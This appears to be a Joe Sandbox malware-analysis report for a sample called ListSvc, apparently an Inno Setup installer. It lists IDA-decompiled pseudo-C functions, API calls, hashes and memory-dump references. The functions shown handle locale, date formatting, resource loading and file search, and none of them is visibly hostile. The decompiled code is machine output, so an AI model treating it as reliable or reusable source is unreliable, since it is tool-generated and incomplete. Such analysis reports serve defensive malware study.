Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Message
String ID: /ALLUSERSInstructs Setup to install in administrative install mode./CURRENTUSERInstructs Setup to install in non administrat$For more detailed information, please visit https://jrsoftware.org/ishelp/index.php?topic=setupcmdline$Setup$The Setup program accepts optional command line parameters./HELP, /?Shows this information./SP-Disables the This will in
API String ID: 2030045667-3391638011
Opcode ID: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction ID: 307a18092975e57fce7d36cb0845ad1ef4e0a75d88e156d2955b45763d379f25
Opcode Fuzzy Hash: 66245cf56300a1c7c541050b9d52e7f7cee767bf73c9c42da64b4bca2bf40a85
Instruction Fuzzy Hash: D701A230748308BBE711E7D1CD52FDEB6A8D74AB04FA0047BB904B25D1D6BC6A09852D

Uniqueness

Uniqueness Score: -1.00%

Function 0042F9B8, Relevance: 7.8, APIs: 5, Instructions: 335
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E0042F9B8(signed short* __eax, signed int __ecx, signed short* __edx, void* __edi, void* __fp0) {
				signed int _v8;
				signed char _v9;
				signed int _v12;
				signed int _v14;
				void* _v20;
				void* _v24;
				signed short* _v28;
				signed short* _v32;
				signed int _v48;
				void* __ebx;
				void* __ebp;
				signed int _t150;
				signed int _t272;
				intOrPtr _t328;
				intOrPtr _t331;
				intOrPtr _t339;
				intOrPtr _t347;
				intOrPtr _t355;
				void* _t360;
				void* _t362;
				intOrPtr _t363;

				_t367 = __fp0;
				_t358 = __edi;
				_t360 = _t362;
				_t363 = _t362 + 0xffffffd4;
				_v8 = __ecx;
				_v32 = __edx;
				_v28 = __eax;
				_v9 = 1;
				_t272 =  *_v28 & 0x0000ffff;
				if((_t272 & 0x00000fff) >= 0x10f) {
					_t150 =  *_v32 & 0x0000ffff;
					if(_t150 != 0) {
						if(_t150 != 1) {
							if(E00430860(_t272,  &_v20) != 0) {
								_push( &_v14);
								_t273 =  *_v20;
								if( *((intOrPtr*)( *_v20 + 8))() == 0) {
									_t275 =  *_v32 & 0x0000ffff;
									if(( *_v32 & 0xfff) >= 0x10f) {
										if(E00430860(_t275,  &_v24) != 0) {
											_push( &_v12);
											_t276 =  *_v24;
											if( *((intOrPtr*)( *_v24 + 4))() == 0) {
												E00428BF0(0xb);
												goto L41;
											} else {
												if(( *_v28 & 0x0000ffff) == _v12) {
													_t143 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t143) & 0x000000ff;
													goto L41;
												} else {
													_push( &_v48);
													L00427244();
													_push(_t360);
													_push(0x42fdb0);
													_push( *[fs:eax]);
													 *[fs:eax] = _t363;
													_t289 = _v12 & 0x0000ffff;
													E004299A4( &_v48, _t276, _v12 & 0x0000ffff, _v28, __edi, __fp0);
													if((_v48 & 0x0000ffff) != _v12) {
														E00428AF8(_t289);
													}
													_t131 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
													_v9 =  *(0x4b93d2 + _v8 * 2 + _t131) & 0x000000ff;
													_pop(_t328);
													 *[fs:eax] = _t328;
													_push(0x42fde5);
													return E00429278( &_v48);
												}
											}
										} else {
											E00428BF0(0xb);
											goto L41;
										}
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fcf7);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t294 =  *_v32 & 0x0000ffff;
										E004299A4( &_v48, _t275,  *_v32 & 0x0000ffff, _v28, __edi, __fp0);
										if(( *_v32 & 0x0000ffff) != _v48) {
											E00428AF8(_t294);
										}
										_v9 = E0042F7D0( &_v48, _v8, _v32, _t358, _t360, _t367);
										_pop(_t331);
										 *[fs:eax] = _t331;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								} else {
									if(( *_v32 & 0x0000ffff) == _v14) {
										_t95 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t95) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42fc52);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t299 = _v14 & 0x0000ffff;
										E004299A4( &_v48, _t273, _v14 & 0x0000ffff, _v32, __edi, __fp0);
										if((_v48 & 0x0000ffff) != _v14) {
											E00428AF8(_t299);
										}
										_t83 = ( *((intOrPtr*)( *_v20 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t83) & 0x000000ff;
										_pop(_t339);
										 *[fs:eax] = _t339;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 2);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(0, 1);
						goto L41;
					}
				} else {
					if(_t272 != 0) {
						if(_t272 != 1) {
							if(E00430860( *_v32 & 0x0000ffff,  &_v24) != 0) {
								_push( &_v12);
								_t282 =  *_v24;
								if( *((intOrPtr*)( *_v24 + 4))() == 0) {
									_push( &_v48);
									L00427244();
									_push(_t360);
									_push(0x42fb63);
									_push( *[fs:eax]);
									 *[fs:eax] = _t363;
									_t306 =  *_v28 & 0x0000ffff;
									E004299A4( &_v48, _t282,  *_v28 & 0x0000ffff, _v32, __edi, __fp0);
									if((_v48 & 0xfff) !=  *_v28) {
										E00428AF8(_t306);
									}
									_v9 = E0042F7D0(_v28, _v8,  &_v48, _t358, _t360, _t367);
									_pop(_t347);
									 *[fs:eax] = _t347;
									_push(0x42fde5);
									return E00429278( &_v48);
								} else {
									if(( *_v28 & 0x0000ffff) == _v12) {
										_t44 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t44) & 0x000000ff;
										goto L41;
									} else {
										_push( &_v48);
										L00427244();
										_push(_t360);
										_push(0x42facc);
										_push( *[fs:eax]);
										 *[fs:eax] = _t363;
										_t311 = _v12 & 0x0000ffff;
										E004299A4( &_v48, _t282, _v12 & 0x0000ffff, _v28, __edi, __fp0);
										if((_v48 & 0xfff) != _v12) {
											E00428AF8(_t311);
										}
										_t32 = ( *((intOrPtr*)( *_v24 + 0x34))(_v8) & 0x0000007f) - 0x1c; // 0x48b0424
										_v9 =  *(0x4b93d2 + _v8 * 2 + _t32) & 0x000000ff;
										_pop(_t355);
										 *[fs:eax] = _t355;
										_push(0x42fde5);
										return E00429278( &_v48);
									}
								}
							} else {
								E00428BF0(__ecx);
								goto L41;
							}
						} else {
							_v9 = E0042F550(_v8, 0);
							goto L41;
						}
					} else {
						_v9 = E0042F53C(1, 0);
						L41:
						return _v9 & 0x000000ff;
					}
				}
			}

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction ID: 1b6310f250808118d38827de8a535e3b6e70e535f73b2508e71121fbf0c58563
Opcode Fuzzy Hash: c6922fb93c990c72bf9a49bf3daa94017bfe3b7264ddd93f55e738123a9900a9
Instruction Fuzzy Hash: 41D19D75E0011A9FCB00EFA9D4919FEB7B5EF48300BD080B6E801A7245D638AD4ADB69

Uniqueness

Uniqueness Score: -1.00%

Function 0041C790, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 77
threadCOMMON

Download Yara Rule

C-Code - Quality: 75%

			E0041C790(void* __eax, void* __ebx, intOrPtr* __edx, void* __esi, intOrPtr _a4) {
				char _v8;
				short _v18;
				short _v22;
				struct _SYSTEMTIME _v24;
				short _v536;
				short* _t32;
				intOrPtr* _t47;
				intOrPtr _t56;
				void* _t61;
				intOrPtr _t63;
				void* _t67;

				_v8 = 0;
				_t47 = __edx;
				_t61 = __eax;
				_push(_t67);
				_push(0x41c873);
				_push( *[fs:eax]);
				 *[fs:eax] = _t67 + 0xfffffdec;
				E00407A20(__edx);
				_v24 =  *(_a4 - 2) & 0x0000ffff;
				_v22 =  *(_a4 - 4) & 0x0000ffff;
				_v18 =  *(_a4 - 6) & 0x0000ffff;
				if(_t61 > 2) {
					E00407E48( &_v8, L"yyyy");
				} else {
					E00407E48( &_v8, 0x41c88c);
				}
				_t32 = E004084EC(_v8);
				if(GetDateFormatW(GetThreadLocale(), 4,  &_v24, _t32,  &_v536, 0x200) != 0) {
					E0040858C(_t47, 0x100,  &_v536);
					if(_t61 == 1 &&  *((short*)( *_t47)) == 0x30) {
						_t63 =  *_t47;
						if(_t63 != 0) {
							_t63 =  *((intOrPtr*)(_t63 - 4));
						}
						E004088AC( *_t47, _t63 - 1, 2, _t47);
					}
				}
				_pop(_t56);
				 *[fs:eax] = _t56;
				_push(0x41c87a);
				return E00407A20( &_v8);
			}

APIs

GetThreadLocale.KERNEL32(00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C816
GetDateFormatW.KERNEL32(00000000,00000004,?,00000000,?,00000200,00000000,0041C873), ref: 0041C81C

Strings

yyyy, xrefs: 0041C7F1
, xrefs: 0041C7E2

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: DateFormatLocaleThread
String ID: $yyyy
API String ID: 3303714858-404527807
Opcode ID: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction ID: d4c72dfe3e93bc103dd676e1b73ac12d517b544291048ec360f079cc1ca068dc
Opcode Fuzzy Hash: 9b84cafd13c5b3a76178dd7a5deb0e6d63fe676c73d736d950a9ec0585647aa0
Instruction Fuzzy Hash: 9A215335A442189BDB11EF95CDC1AAEB3B8EF08701F5144BBFC45E7281D7789E4087AA

Uniqueness

Uniqueness Score: -1.00%

Function 0041EEFC, Relevance: 6.1, APIs: 4, Instructions: 113
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0041EEFC(intOrPtr* __eax, void* __ebx, intOrPtr __ecx, void* __edx, void* __edi, void* __esi, void* _a4) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v534;
				short _v1056;
				short _v1568;
				struct _MEMORY_BASIC_INFORMATION _v1596;
				char _v1600;
				intOrPtr _v1604;
				char _v1608;
				intOrPtr _v1612;
				char _v1616;
				intOrPtr _v1620;
				char _v1624;
				char* _v1628;
				char _v1632;
				char _v1636;
				char _v1640;
				intOrPtr _t55;
				signed int _t76;
				void* _t82;
				intOrPtr _t83;
				intOrPtr _t95;
				intOrPtr _t98;
				intOrPtr _t100;
				intOrPtr* _t102;
				void* _t105;

				_v1640 = 0;
				_v8 = __ecx;
				_t82 = __edx;
				_t102 = __eax;
				_push(_t105);
				_push(0x41f0a8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t105 + 0xfffff99c;
				VirtualQuery(__edx,  &_v1596, 0x1c);
				if(_v1596.State != 0x1000 || GetModuleFileNameW(_v1596.AllocationBase,  &_v1056, 0x105) == 0) {
					GetModuleFileNameW( *0x4be634,  &_v1056, 0x105);
					_v12 = E0041EEF0(_t82);
				} else {
					_v12 = _t82 - _v1596.AllocationBase;
				}
				E0041A57C( &_v534, 0x104, E00420608() + 2);
				_t83 = 0x41f0bc;
				_t100 = 0x41f0bc;
				_t95 =  *0x414db8; // 0x414e10
				if(E00405F30(_t102, _t95) != 0) {
					_t83 = E004084EC( *((intOrPtr*)(_t102 + 4)));
					_t76 = E00407F04(_t83);
					if(_t76 != 0 &&  *((short*)(_t83 + _t76 * 2 - 2)) != 0x2e) {
						_t100 = 0x41f0c0;
					}
				}
				_t55 =  *0x4ba774; // 0x40e708
				_t18 = _t55 + 4; // 0xffec
				LoadStringW(E00409FF0( *0x4be634),  *_t18,  &_v1568, 0x100);
				E00405BE8( *_t102,  &_v1640);
				_v1636 = _v1640;
				_v1632 = 0x11;
				_v1628 =  &_v534;
				_v1624 = 0xa;
				_v1620 = _v12;
				_v1616 = 5;
				_v1612 = _t83;
				_v1608 = 0xa;
				_v1604 = _t100;
				_v1600 = 0xa;
				E0041A814(4,  &_v1636);
				E00407F04(_v8);
				_pop(_t98);
				 *[fs:eax] = _t98;
				_push(0x41f0af);
				return E00407A20( &_v1640);
			}

APIs

VirtualQuery.KERNEL32(?,?,0000001C,00000000,0041F0A8), ref: 0041EF2F
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF53
GetModuleFileNameW.KERNEL32(?,?,00000105), ref: 0041EF6E
LoadStringW.USER32(00000000,0000FFEC,?,00000100), ref: 0041F009

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: FileModuleName$LoadQueryStringVirtual
String ID:
API String ID: 3990497365-0
Opcode ID: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction ID: 1578eb45e464442e6080653f6025888c356fcaddc808aab3f6789ba0ce71ce89
Opcode Fuzzy Hash: b8be0fea34dc80bb7553a8da0885c656d5cafed23f6e23429f91232411ad397e
Instruction Fuzzy Hash: 3E412374A002589FDB20DF59CC81BCAB7F9AB58304F4044FAE508E7242D7799E95CF59

Uniqueness

Uniqueness Score: -1.00%

Function 0040A6C8, Relevance: 6.1, APIs: 4, Instructions: 95
threadCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040A6C8(signed short __eax, void* __edx) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				signed int _v20;
				short _v22;
				short _v24;
				char _v26;
				char _v32;
				void* __ebp;
				void* _t39;
				void* _t55;
				void* _t59;
				short* _t62;
				signed short _t66;
				void* _t67;
				void* _t68;
				signed short _t79;
				void* _t81;

				_t81 = __edx;
				_t66 = __eax;
				_v16 = 0;
				if(__eax !=  *0x4bdc08()) {
					_v16 = E0040A684( &_v8);
					_t79 = _t66;
					_v20 = 3;
					_t62 =  &_v26;
					do {
						 *_t62 =  *(0xf + "0123456789ABCDEF") & 0x000000ff;
						_t79 = (_t79 & 0x0000ffff) >> 4;
						_v20 = _v20 - 1;
						_t62 = _t62 - 2;
					} while (_v20 != 0xffffffff);
					_v24 = 0;
					_v22 = 0;
					 *0x4bdc04(4,  &_v32,  &_v20);
				}
				_t39 = E0040A684( &_v12);
				_t67 = _t39;
				if(_t67 != 0) {
					_t55 = _v12 - 2;
					if(_t55 >= 0) {
						_t59 = _t55 + 1;
						_v20 = 0;
						do {
							if( *((short*)(_t67 + _v20 * 2)) == 0) {
								 *((short*)(_t67 + _v20 * 2)) = 0x2c;
							}
							_v20 = _v20 + 1;
							_t59 = _t59 - 1;
						} while (_t59 != 0);
					}
					E00408550(_t81, _t67);
					_t39 = E0040540C(_t67);
				}
				if(_v16 != 0) {
					 *0x4bdc04(0, 0,  &_v20);
					_t68 = E0040A684( &_v12);
					if(_v8 != _v12 || E0040A660(_v16, _v12, _t68) != 0) {
						 *0x4bdc04(8, _v16,  &_v20);
					}
					E0040540C(_t68);
					return E0040540C(_v16);
				}
				return _t39;
			}

APIs

GetThreadUILanguage.KERNEL32(?,00000000), ref: 0040A6D9
SetThreadPreferredUILanguages.KERNEL32(00000004,?,?), ref: 0040A737
SetThreadPreferredUILanguages.KERNEL32(00000000,00000000,?), ref: 0040A794
SetThreadPreferredUILanguages.KERNEL32(00000008,?,?), ref: 0040A7C7

Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,00000000,?,?,0040A745), ref: 0040A69B
Part of subcall function 0040A684: GetThreadPreferredUILanguages.KERNEL32(00000038,?,00000000,?,?,?,0040A745), ref: 0040A6B8

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Thread$LanguagesPreferred$Language
String ID:
API String ID: 2255706666-0
Opcode ID: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction ID: 64ac70e7ec2a8712ea9b0e83aabe60772fb1db60419ab041f5eb1837937ee239
Opcode Fuzzy Hash: 4c514f641868e752fd40307e4922e2f5a84495159d338bc2b006041d37f1dfb0
Instruction Fuzzy Hash: 97317070E0021A9BDB10DFA9C884AAFB7B8EF04304F00867AE555E7291EB789E05CB55

Uniqueness

Uniqueness Score: -1.00%

Function 004AF9F0, Relevance: 6.0, APIs: 4, Instructions: 31
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004AF9F0() {
				struct HRSRC__* _t10;
				void* _t11;
				void* _t12;

				_t10 = FindResourceW(0, 0x2b67, 0xa);
				if(_t10 == 0) {
					E004AF834();
				}
				if(SizeofResource(0, _t10) != 0x2c) {
					E004AF834();
				}
				_t11 = LoadResource(0, _t10);
				if(_t11 == 0) {
					E004AF834();
				}
				_t12 = LockResource(_t11);
				if(_t12 == 0) {
					E004AF834();
				}
				return _t12;
			}

0x004af9ff
0x004afa03
0x004afa05
0x004afa05
0x004afa15
0x004afa17
0x004afa17
0x004afa24
0x004afa28
0x004afa2a
0x004afa2a
0x004afa35
0x004afa39
0x004afa3b
0x004afa3b
0x004afa43

APIs

FindResourceW.KERNEL32(00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E,?,00000000,004B65E2), ref: 004AF9FA
SizeofResource.KERNEL32(00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000,004B659E), ref: 004AFA0D
LoadResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002,00000000), ref: 004AFA1F
LockResource.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00002B67,0000000A,?,004B5F8E,00000000,004B654A,?,00000001,00000000,00000002), ref: 004AFA30

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: Resource$FindLoadLockSizeof
String ID:
API String ID: 3473537107-0
Opcode ID: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction ID: 8c15b2061d88d30e204a2d131290402b8da5209396f43898e5d703764eea749b
Opcode Fuzzy Hash: 128b44542abe6d6e0e09835f67cf23f4a4e4be27e5836866f54195567a651b81
Instruction Fuzzy Hash: FCE07E8074634625FA6436F718D7BAE00084B36B4DF40593FFA08A92D2EEAC8C19522E

Uniqueness

Uniqueness Score: -1.00%

Function 00420BD8, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00420BD8() {
				void* __ebx;
				struct HINSTANCE__* _t1;
				void* _t4;

				_t1 = GetModuleHandleW(L"kernel32.dll");
				_t3 = _t1;
				if(_t1 != 0) {
					_t1 = E0040E1A8(_t3, _t4, _t3, L"GetDiskFreeSpaceExW");
					 *0x4b7e30 = _t1;
				}
				if( *0x4b7e30 == 0) {
					 *0x4b7e30 = E0041A4DC;
					return E0041A4DC;
				}
				return _t1;
			}

0x00420bde
0x00420be3
0x00420be7
0x00420bef
0x00420bf4
0x00420bf4
0x00420c00
0x00420c07
0x00000000
0x00420c07
0x00420c0d

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,?,00420CB4,00000000,00420CCC,?,?,00420C69), ref: 00420BDE

Part of subcall function 0040E1A8: GetProcAddress.KERNEL32(?,00423116), ref: 0040E1D2

Strings

kernel32.dll, xrefs: 00420BD9
GetDiskFreeSpaceExW, xrefs: 00420BE9

Memory Dump Source

Source File: 00000002.00000002.370471802.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.370460929.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370680209.00000000004B7000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370687660.00000000004C0000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.370693498.00000000004C4000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.370699761.00000000004C6000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_ListSvc.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetDiskFreeSpaceExW$kernel32.dll
API String ID: 1646373207-1127948838
Opcode ID: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction ID: d69f2d486575a746b5ffe9d6a82661523d0842203aaa5c8b8dd0cb43f1f92830
Opcode Fuzzy Hash: f76785e0005e833dd4a9f921d8d2e36157eed1af70da7a881872f52b203e86d0
Instruction Fuzzy Hash: 31D05EB03143165FE7056BB2ACC561636C6AB86304B900B7BA5046A243CBFDDC50434C

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: ListSvc.tmp PID: 6368 Parent PID: 6348 ListSvc.tmpCOMMON

Execution Graph

Execution Coverage:	9.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	1564
Total number of Limit Nodes:	89

Executed Functions

Function 0040E7F0, Relevance: 3.1, APIs: 2, Instructions: 63COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNEL32(00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E822
GetLocaleInfoW.KERNEL32(?,00000003,?,00000004,00000000,0040E8B0,?,?), ref: 0040E82B

Part of subcall function 0040E6A0: FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
Part of subcall function 0040E6A0: FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseDefaultFileFirstInfoLanguageLocaleUser
String ID:
API String ID: 3216391948-0
Opcode ID: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction ID: 1e50cd0e94847efb8cb05e6df71b151ee34378a03d53e12baea26e8823c5d93b
Opcode Fuzzy Hash: 4f4e845a1bd2874fd9ef47becd123c76b58742bb5706f28c9b712a7f9af8110b
Instruction Fuzzy Hash: 71114270A002099BDB04EF96D982AAEB3B9EF45304F90487EF904B73C1D7395E148B6D

Uniqueness

Uniqueness Score: -1.00%

Function 0060C2B0, Relevance: 3.0, APIs: 2, Instructions: 45fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2ED
GetLastError.KERNEL32(00000000,?,00000000,0060C313,?,?,?,00000000), ref: 0060C2F5

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: ErrorFileFindFirstLast
String ID:
API String ID: 873889042-0
Opcode ID: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
Instruction ID: 0e0656a6fbe86c5836fc78b0efda7e26b232c5910eabf30e6ebd6b813bae866c
Opcode Fuzzy Hash: 48cb86c36632e8c72cb41299c80d55c8f2305584a3cc239000e223bcc48676ca
Instruction Fuzzy Hash: 1BF0F931A84208ABCB14DFBA9C0189FF7ADEB4533075147BAF814D32D1DB744E004598

Uniqueness

Uniqueness Score: -1.00%

Function 0040E6A0, Relevance: 3.0, APIs: 2, Instructions: 33fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?,00000000,0040E6FE,?,?), ref: 0040E6D3
FindClose.KERNEL32(00000000,00000000,?,00000000,0040E6FE,?,?), ref: 0040E6E3

Memory Dump Source

Source File: 00000003.00000002.367246226.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000003.00000002.367241331.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367673578.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367683828.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367693257.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367703897.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367713912.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367722913.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367739605.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.367745066.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.367757683.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.367770743.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_ListSvc.jbxd

Similarity

API ID: Find$CloseFileFirst
String ID:
API String ID: 2295610775-0
